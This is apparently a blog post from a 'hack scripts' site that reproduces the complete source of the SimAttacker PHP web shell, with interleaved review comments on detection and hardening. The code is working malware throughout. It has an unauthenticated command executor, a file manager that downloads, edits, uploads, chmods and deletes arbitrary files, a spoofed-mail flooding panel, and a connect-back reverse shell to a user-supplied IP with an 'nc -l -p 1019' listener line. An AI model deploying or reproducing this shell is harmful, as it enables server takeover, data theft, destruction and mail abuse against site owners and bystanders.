HackingScripts

Hack Scripts for everybody

SimAttacker Shell

19 Feb 2014

I previously called this ‘best friends shell’. I now know that it’s called the SimAttacker shell.

Coded by Hossein Asgary, an Iranian hacker who is part of Simorgh Security Group.

SimAttacker Shell Source Code

  1 <?
    // Review note: this handler runs before any HTML is sent, and nothing in
    // this block authenticates the caller or restricts the path. The raw
    // `fdownload` query value is handed to fopen(), so a single request can
    // retrieve any file the PHP process is able to read.
    // Detection: access-log entries whose query string carries `fdownload=`
    // followed by a filesystem path.
    // Hardening: an open_basedir restriction limits which paths fopen() can
    // reach. The script also relies on the short open tag, so it only executes
    // where short_open_tag is enabled.
  2 //download Files  Code
  3 $fdownload=$_GET['fdownload'];
  4 if ($fdownload <> "" ){
  5 // path & file name
  6 $path_parts = pathinfo("$fdownload");
  7 $entrypath=$path_parts["basename"];
  8 $name = "$fdownload";
    // The fopen() result is not checked; a failed open still falls through to
    // the header() and fpassthru() calls below.
  9 $fp = fopen($name, 'rb');
    // The download name is the basename of the requested path, placed into the
    // header without escaping.
 10 header("Content-Disposition: attachment; filename=$entrypath");
 11 header("Content-Length: " . filesize($name));
 12 fpassthru($fp);
 13 exit;
 14 }
 15 ?>
 16     
 17 <html>
 18 
 19 <head>
 20 <meta http-equiv="Content-Language" content="en-us">
 21 <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
 22 <title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
 23 <style>
 24 <!--
 25 body         { font-family: Tahoma; font-size: 8pt }
 26 -->
 27 </style>
 28 </head>
 29 <body>
 30 <?
    // Only errors, warnings and parse errors are reported; notices (for example
    // from request keys that are absent when read below) are not shown.
 31 error_reporting(E_ERROR | E_WARNING | E_PARSE);
 32 
 33  //File Edit
    // Review note: file-edit panel. `fedit` (GET) names a file that is resolved
    // with realpath(), read with file() and shown in a textarea. Nothing in this
    // block checks who is asking. The file content is passed through
    // htmlspecialchars(), but $fedit is written into the value attribute
    // unescaped.
 34  $fedit=$_GET['fedit'];
 35  if ($fedit <> "" ){
 36  $fedit=realpath($fedit);
 37  $lines = file($fedit);
 38  echo "<form action='' method='POST'>";
 39 echo "<textarea name='savefile' rows=30 cols=80>" ;
 40 foreach ($lines as $line_num => $line) {
 41  echo htmlspecialchars($line);
 42 }
 43 echo "</textarea>
 44     <input type='text' name='filepath'  size='60' value='$fedit'>
 45     <input type='submit' value='save'></form>";
    // Save step: the write target is the POSTed `filepath` field, not `fedit`,
    // so the file written can differ from the one displayed. Mode w+ truncates
    // the target and the POSTed `savefile` text is written as received.
    // Detection: a GET carrying `fedit=` followed by a POST with
    // `savefile`/`filepath` fields; unexpected modification times on files
    // writable by the web-server account (file-integrity monitoring).
 46     $savefile=$_POST['savefile'];
 47     $filepath=realpath($_POST['filepath']);
 48     if ($savefile <> "") 
 49     {
 50     $fp=fopen("$filepath","w+");
 51     fwrite ($fp,"") ;
 52     fwrite ($fp,$savefile) ;
 53     fclose($fp);
 54     echo "<script language='javascript'> close()</script>";
 55     }
 56 exit();
 57  }
 58 ?>
 59 <?
 60 // CHmod - PRimission
    // Review note: permission panel. `fchmod` (GET) is resolved with realpath()
    // and the POSTed `chmod0` string is handed to chmod() as the mode with no
    // validation and no credential check in this block.
    // The else branch prints its message whenever `chmod0` is empty, which
    // includes the first display of the form.
    // Detection: requests with `fchmod=` in the query string; permission changes
    // on web-root files made by the web-server account.
 61 $fchmod=$_GET['fchmod'];
 62 if ($fchmod <> "" ){
 63 $fchmod=realpath($fchmod);
 64 echo "<center><br>
 65 chmod for :$fchmod<br>
 66 <form method='POST' action=''><br>
 67 Chmod :<br>
 68 <input type='text' name='chmod0' ><br>
 69 <input type='submit' value='change chmod'>
 70 </form>";
 71 $chmod0=$_POST['chmod0'];
 72 if ($chmod0 <> ""){
 73 chmod ($fchmod , $chmod0);
 74 }else {
 75 echo "primission Not Allow change Chmod";
 76 }
 77 exit();
 78 }
 79 ?>
 80     
 81 <div align="center">
 82     <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
 83         <tr>
 84             <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
 85                 <p align="center"><b>
 86                 <font face="Tahoma" size="2"><br>
 87                 </font>
 88                 <font color="#D2D200" face="Tahoma" size="2">
 89                 <span style="text-decoration: none">
 90                 <font color="#000000">
 91                 <a href="?id=fm&dir=<?
 92     echo getcwd();
 93     ?>
 94     ">
 95                 <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
 96                 <p align="center"><b><a href="?id=cmd">
 97                 <span style="text-decoration: none">
 98                 <font face="Tahoma" size="2" color="#000000">
 99                 CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
100                 <p align="center"><b><a href="?id=fake-mail">
101                 <font face="Tahoma" size="2" color="#000000">
102                 <span style="text-decoration: none">Fake mail</span></font></a></b></p>
103                 <p align="center"><b>
104                 <font face="Tahoma" size="2" color="#000000">
105                 <a href="?id=cshell">
106                 <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
107                 <p align="center"><b>
108                 <font color="#000000" face="Tahoma" size="2">
109                 <a href="?id=">
110                 <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
111                 <p>&nbsp;<p align="center">&nbsp;</td>
112             <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
113             <?
114             //*******************************************************
115             //Start Programs About US
116             $id=$_GET['id'];
                // Review note: `id` (GET) is read here; an empty value renders the
                // banner below, followed by php_uname() output and the requesting
                // client's address from REMOTE_ADDR.
                // The banner text is static, so its strings can serve as content
                // signatures when scanning a web root for this file.
                // NOTE(review): the <img ... class="wp-smiley"> markup on the "Enjoy"
                // line looks like a rendering artefact of the hosting blog rather
                // than part of the original file. As listed, its double quotes would
                // end the PHP string early. Leave that fragment out of any signature.
117 
118             if ($id=="") {
119             echo "
120             <font face='Arial Black' color='#808080' size='1'>
121 ***************************************************************************<br>
122 &nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
123 &nbsp;Programer : Hossein Asgary <br>
124 &nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
125 &nbsp;please : If you find bug or problems in program , tell me by : <br>
126 &nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
127 Enjoy <img src="/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /> [Only 4 Best Friends ] <br>
128 ***************************************************************************</font></span></p>
129 ";
130 
131 echo "<font color='#333333' size='2'>OS :". php_uname();
132 echo "<br>IP :". 
133 ($_SERVER['REMOTE_ADDR']);
134 echo "</font>";
135 
136 
137             }
138             //************************************************************
139             //cmd-command line
                // Review note: when $id equals "cmd", the POSTed `cmd` string is passed
                // unmodified to shell_exec() and the output is echoed into the page.
                // Both $result and $cmd are written into the HTML without escaping.
                // No credential check appears in this block.
                // Detection: POST bodies containing `cmd=` sent to a PHP file, and
                // shell processes spawned as children of the web-server/PHP worker.
                // Hardening: listing shell_exec in the php.ini disable_functions
                // directive makes this call fail.
140             $cmd=$_POST['cmd'];
141             if($id=="cmd"){
142         $result=shell_exec("$cmd");
143         echo "<br><center><h3> CMD ExeCute </h3></center>" ;
144         echo "<center>
145         <textarea rows=20 cols=70 >$result</textarea><br>
146         <form method='POST' action=''>
147         <input type='hidden' name='id' value='cmd'>
148         <input type='text' size='80' name='cmd' value='$cmd'>
149         <input type='submit' value='cmd'><br>";
150             
151             
152             
153             }
154             
155         //********************************************************    
156         
157         //fake mail = Use victim server 4 DOS - fake mail 
            // Review note: mail-flood panel. error_reporting(0) silences all PHP
            // errors for the rest of the request. When `to` (POST) is set, the loop
            // calls mail() `nom` times, and `nom` is taken from the request with no
            // upper bound. Each message gets a random numeric sender at
            // "Attacker.com", a subject equal to md5() of that sender, and the
            // POSTed `Comments` text as the body.
            // Detection: a burst of outbound mail from the web host, From
            // addresses of the form <digits>@Attacker.com, and subjects that are
            // 32 hexadecimal characters. Per-account rate limits at the MTA bound
            // the volume. Listing mail in disable_functions blocks the call where
            // the site does not need it.
158         if ( $id=="fake-mail"){
159         error_reporting(0);
160         echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
161         echo "<center><form method='post' action=''>
162         Victim Mail :<br><input type='text' name='to' ><br>
163         Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
164         Comments:
165         <br>
166         <textarea rows='10' cols=50 name='Comments' ></textarea><br>
167         <input type='submit' value='Send Mail Strm ' >
168         </form></center>";
169         //send Storm Mail
170         $to=$_POST['to'];
171         $nom=$_POST['nom'];
172         $Comments=$_POST['Comments'];
173         if ($to <> "" ){
174         for ($i = 0; $i < $nom ; $i++){
175         $from = rand (71,1020000000)."@"."Attacker.com";
176         $subject= md5("$from");
177         mail($to,$subject,$Comments,"From:$from");
178         echo "$i is ok";
179         }      
180         echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
181         }
182         }
183         //********************************************************
184 
185             //Connect Back -Firewall Bypass
                // Review note: when $id equals "cshell" and `mip` (POST) is set, the
                // script opens an outbound TCP connection with fsockopen() to the
                // POSTed host and port (the form pre-fills 1019). It then loops until
                // the peer closes: read one line of up to 4096 bytes from the socket,
                // run it through the backtick operator, write the output back.
                // The connection originates from the web server, which is why inbound
                // filtering alone does not stop it. Egress filtering on the web tier
                // does.
                // Detection: a PHP request that stays open while the web-server
                // process holds an outbound TCP session to an unfamiliar address. The
                // banner and the " bash # " prompt below are sent in clear text and
                // can be matched on the wire.
                // Hardening: the backtick operator is unavailable when shell_exec is
                // listed in disable_functions.
186             if ($id=="cshell"){
187             echo "<br>Connect back Shell , bypass Firewalls<br>
188             For user :<br>
189             nc -l -p 1019 <br>
190             <hr>
191             <form method='POST' action=''><br>
192             Your IP & BindPort:<br>
193             <input type='text' name='mip' >
194             <input type='text' name='bport' size='5' value='1019'><br>
195             <input type='submit' value='Connect Back'>
196             </form>";
197          $mip=$_POST['mip'];
198          $bport=$_POST['bport'];
199          if ($mip <> "")
200          {
201          $fp=fsockopen($mip , $bport , $errno, $errstr);
202          if (!$fp){
203                $result = "Error: could not open socket connection";
204          }
205          else {
206          fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
207       while(!feof($fp)){ 
208        fputs ($fp," bash # ");
209        $result= fgets ($fp, 4096);
210       $message=`$result`;
211        fputs ($fp,"--> ".$message."\n");
212       }
213       fclose ($fp);
214          }
215          }
216             }
217             
218         //********************************************************
219             //Spy File Manager
                // Review note: file-manager panel. `dir` (GET) is resolved with
                // realpath() and, when $id equals "fm", every entry of that directory
                // is listed with links that carry the full path in `fdownload`,
                // `fedit`, `fchmod` and `fdelete` query parameters. No credential
                // check appears in this block.
                // $homedir, $dir and $file are written into the HTML and the link
                // targets without escaping or URL-encoding.
                // Detection: access-log query strings combining `id=fm` with `dir=`
                // or with one of the four parameters above.
                // Hardening: an open_basedir restriction limits which directories
                // can be listed.
220             $homedir=getcwd();
221             $dir=realpath($_GET['dir'])."/";
222             if ($id=="fm"){
223             echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
224                   &nbsp;<b>
225                   <form action='' method='GET'>
226                   &nbsp;Path:</b>
227                   <input type='hidden' name='id' value='fm'>
228                   <input type='text' name='dir' size='80' value='$dir'>
229                   <input type='submit' value='dir'>
230                   </form>
231                  <br>";
232 
233             echo "
234 
235 <div align='center'>
236 
237 <table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
238     <tr>
239         <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
240         <td height='28' width='82' align='center'>
241         <font color='#000080' size='2'><b>Size KByte</b></font></td>
242         <td height='28' width='83' align='center'>
243         <font color='#008000' size='2'><b>Download</b></font></td>
244         <td height='28' width='66' align='center'>
245         <font color='#FF9933' size='2'><b>Edit</b></font></td>
246         <td height='28' width='75' align='center'>
247         <font color='#999999' size='2'><b>Chmod</b></font></td>
248         <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
249     </tr>";
                // One table row is emitted per name returned by readdir(); the loop
                // applies no filtering to the names.
250             if (is_dir($dir)){
251             if ($dh=opendir($dir)){
252             while (($file = readdir($dh)) !== false) {
253             $fsize=round(filesize($dir . $file)/1024);
254         
255             
256     echo " 
257     <tr>
258         <th width='250' height='22' align='left' nowrap>";
259         if (is_dir($dir.$file))
260         {
261         echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
262         }
263         else {
264         echo "<font size='2' color='#666666'>&nbsp;$file ";
265         }
266         echo "</a></font></th>
267         <td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
268         if (is_file($dir.$file))
269         {
270         echo "$fsize";
271         }
272         else {
273         echo "&nbsp; ";
274         }
275         echo "
276         </b></font></td>
277         <td width='103' align='center' nowrap>";
278         if (is_file($dir.$file)){
279         if (is_readable($dir.$file)){
280         echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
281         }else {
282         echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
283          }
284         }else {
285         echo "&nbsp;";
286          }
287         echo "
288         </a></font></td>
289         <td width='77' align='center' nowrap>";
290         if (is_file($dir.$file))
291         {
292         if (is_readable($dir.$file)){
293         echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
294         }else {
295         echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
296          }
297         }else {
298         echo "&nbsp;";
299          }
300         echo "
301         </a></font></td>
302         <td width='86' align='center' nowrap>";
303         if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
304         echo "<font size='1' color='#999999'>Dont in windows";
305         }
306         else {
307         echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
308         }
309         echo "</a></font></td>
310         <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
311     </tr>
312     ";
313               }
314               closedir($dh);
315             } 
316             }
                // Upload form: it posts back to the current URL, and the 300000-byte
                // MAX_FILE_SIZE value is a form field supplied by the client.
317             echo "</table>
318 <form enctype='multipart/form-data' action='' method='POST'>
319  <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
320  Send this file: <input name='userfile' type='file' />
321  <inpt type='hidden' name='Fupath'  value='$dir'>
322  <input type='submit' value='Send File' />
323 </form> 
324             </div>";
325             }
326 //Upload Files 
    // Review note: this block runs whenever `dir` (GET) is non-empty; it does not
    // test $id. The destination is `dir` plus the client-supplied file name from
    // $_FILES, with no check on extension, content type or target directory
    // before move_uploaded_file().
    // Detection: multipart POSTs to this script, and new files owned by the
    // web-server account appearing under the web root.
    // Hardening: directories the web-server account can write to should not be
    // configured to execute PHP.
327 $rpath=$_GET['dir'];
328 if ($rpath <> "") {
329 $uploadfile = $rpath."/" . $_FILES['userfile']['name'];
330 print "<pre>";
331 if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
332 echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
333 echo "<script language='javascript'> history.back(2)</script>";
334 }
335  }
336  //file deleted
    // Review note: `fdelete` (GET) triggers deletion with no confirmation and no
    // credential check in this block, so a plain link request changes state on
    // disk. For a directory, the entries matched by glob() with the '/*.*'
    // pattern are unlinked and rmdir() is called inside the same loop. For any
    // other path, unlink() is called directly and the script exits.
    // Detection: `fdelete=` in access-log query strings; unexplained file or
    // directory removals performed by the web-server account.
337 $frpath=$_GET['fdelete'];
338 if ($frpath <> "") {
339 if (is_dir($frpath)){
340 $matches = glob($frpath . '/*.*');
341 if ( is_array ( $matches ) ) {
342   foreach ( $matches as $filename) {
343   unlink ($filename);
344   rmdir("$frpath");
345 echo "<script language='javascript'> alert('Success! Please refresh')</script>";
346 echo "<script language='javascript'> history.back(1)</script>";
347   }
348   }
349   }
350   else{
351 echo "<script language='javascript'> alert('Success! Please refresh')</script>";
352 unlink ("$frpath");
353 echo "<script language='javascript'> history.back(1)</script>";
354 exit(0);
355 
356   }
357   
358 
359 }
360             ?>
361             
362             </td>
363         </tr>
364         <tr>
365             <td style="border: 1px dotted #FFCC66">
366             <p align="center"><font color="#666666" size="1" face="Tahoma"><br>
367             Copyright 2004-Simorgh Security<br>
368             Hossein-Asgari<br>
369             </font><font color="#c0c0c0" size="1" face="Tahoma">
370         <a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
371         <font color="#666666">www.simorgh-ev.com</font></a></font></td>
372         </tr>
373     </table>
374 </div>
375 
376 </body>
377 
378 </html>

SimAttacker Shell screenshot

SimAttacker script screenshot

SimAttacker script screenshot